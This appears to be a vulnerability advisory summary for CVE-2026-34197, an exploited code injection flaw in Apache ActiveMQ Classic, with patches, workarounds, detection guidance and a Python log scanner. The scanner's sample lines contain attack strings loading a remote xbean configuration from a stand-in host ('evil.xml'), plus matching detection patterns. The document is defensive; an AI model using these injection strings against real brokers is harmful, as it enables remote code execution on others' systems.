Full Report
Nonprofit security organization Shadowserver found that over 6,400 Apache ActiveMQ servers exposed online are vulnerable to ongoing attacks exploiting a high-severity code injection vulnerability. [...]
Analysis Summary
# Vulnerability: Remote Code Execution in Apache ActiveMQ (Jolokia/XBean)
## CVE Details
- **CVE ID**: CVE-2026-34197
- **CVSS Score**: High (the source gives no numerical CVSS score; the flaw is categorized as high-severity RCE)
- **CWE**: Improper Input Validation leading to Code Injection
## Affected Systems
- **Products**: Apache ActiveMQ Classic
- **Versions**: Versions prior to 6.2.3 and 5.19.4 (note: the flaw existed in the code base for 13 years)
- **Configurations**: Systems running the Jolokia management component or with accessible internal transport protocols.
## Vulnerability Description
The flaw is a code injection vulnerability stemming from improper input validation. Specifically, it involves the handling of the internal transport protocol `VM` and the `brokerConfig` parameter. Authenticated threat actors can leverage this weakness to inject malicious configurations (via xbean:http), leading to remote code execution (RCE) on the host system.
## Exploitation
- **Status**: **Exploited in the wild**. Proof of Concept (PoC) methods are well-known, and CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog.
- **Complexity**: Low (Methods for exploitation are described as well-known/well-documented).
- **Attack Vector**: Network (Requires authentication).
## Impact
- **Confidentiality**: High (Full system access possible via RCE)
- **Integrity**: High (Ability to modify broker configurations and execute arbitrary commands)
- **Availability**: High (Potential for complete system takeover or service disruption)
## Remediation
### Patches
Update to the following versions or newer:
- **Apache ActiveMQ Classic 6.2.3**
- **Apache ActiveMQ Classic 5.19.4**
### Workarounds
- Restrict network access to the ActiveMQ management console.
- Follow CISA BOD 22-01 guidance for cloud services or discontinue use if patching is not immediately feasible.
## Detection
- **Indicators of Compromise (IoCs)**: Scan broker logs for suspicious connection strings utilizing the internal transport protocol `VM`.
- **Detection Query**: Look for the string `brokerConfig=xbean:http://` in logs, which indicates an attempt to load a remote configuration file.
- **Monitoring**: Shadowserver actively tracks exposed, vulnerable fingerprints (over 6,400 instances currently online).
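Added example (not from the advisory, Shadowserver or the ActiveMQ project): a small Python scanner for the two log indicators above, run over constructed sample log lines. The timestamp/level layout of the lines is an assumption; only the `brokerConfig=xbean:http://` and `vm://` indicators come from the description above, and the remote-scheme check is generalized from `http://` to `https://` and `ftp://`.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample log lines (not real ActiveMQ output); the timestamp/level
# layout is an assumption, only the indicator strings come from the advisory.
SAMPLE_LOGS = [
    "2026-04-01T10:00:01Z INFO  connector request: "
    "vm://localhost?brokerConfig=xbean:http://203.0.113.77/evil.xml",
    "2026-04-01T10:00:05Z INFO  connector request: "
    "vm%3A%2F%2Flocalhost%3FbrokerConfig%3Dxbean%3Ahttps%3A%2F%2F203.0.113.77%2Fc.xml",
    "2026-04-01T10:01:00Z INFO  client connected via tcp://10.0.0.8:61616",
    "2026-04-01T10:02:00Z INFO  connector request: vm://broker?brokerConfig=xbean:activemq.xml",
    "2026-04-01T10:03:00Z INFO  connector vm://localhost started",
]

# brokerConfig pointing xbean at a *remote* resource: the page's primary IoC,
# generalized from http:// to https:// and ftp://.
REMOTE_XBEAN = re.compile(r"brokerConfig=xbean:(?:https?|ftp)://[^\s&'\"]+", re.IGNORECASE)
# Any VM transport URI carrying a brokerConfig parameter: worth a manual look
# even when the target is local, because this is the knob the flaw abuses.
VM_WITH_CONFIG = re.compile(r"vm://[^\s'\"]*\?[^\s'\"]*brokerConfig=", re.IGNORECASE)

def normalize(line: str) -> str:
    """Strip up to two layers of URL-encoding so encoded indicators still match."""
    for _ in range(2):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def classify(line: str) -> Optional[str]:
    """Return 'high', 'medium' or None for one log line."""
    text = normalize(line)
    if REMOTE_XBEAN.search(text):
        return "high"      # attempt to load a remote configuration file
    if VM_WITH_CONFIG.search(text):
        return "medium"    # VM transport with brokerConfig set: review manually
    return None

def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_no, severity, decoded_line) for every line that matches."""
    hits = []
    for i, line in enumerate(lines, start=1):
        severity = classify(line)
        if severity:
            hits.append((i, severity, normalize(line)))
    return hits

if __name__ == "__main__":
    for line_no, severity, text in scan(SAMPLE_LOGS):
        print(f"line {line_no} [{severity}]: {text}")
```

Feed real broker or reverse-proxy logs through `scan()` line by line; the decoding step matters because the indicator string may arrive percent-encoded inside a request URL.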
## References
- **Vendor Advisory**: [http[:]//activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt]
- **Horizon3 Research**: [https[:]//horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/]
- **NVD**: [http[:]//nvd.nist.gov/vuln/detail/CVE-2026-34197]
- **CISA KEV Catalog**: [https[:]//www.cisa.gov/known-exploited-vulnerabilities-catalog]
- **Shadowserver Statistics**: [https[:]//dashboard.shadowserver.org/statistics/combined/time-series/?tag=cve-2026-34197]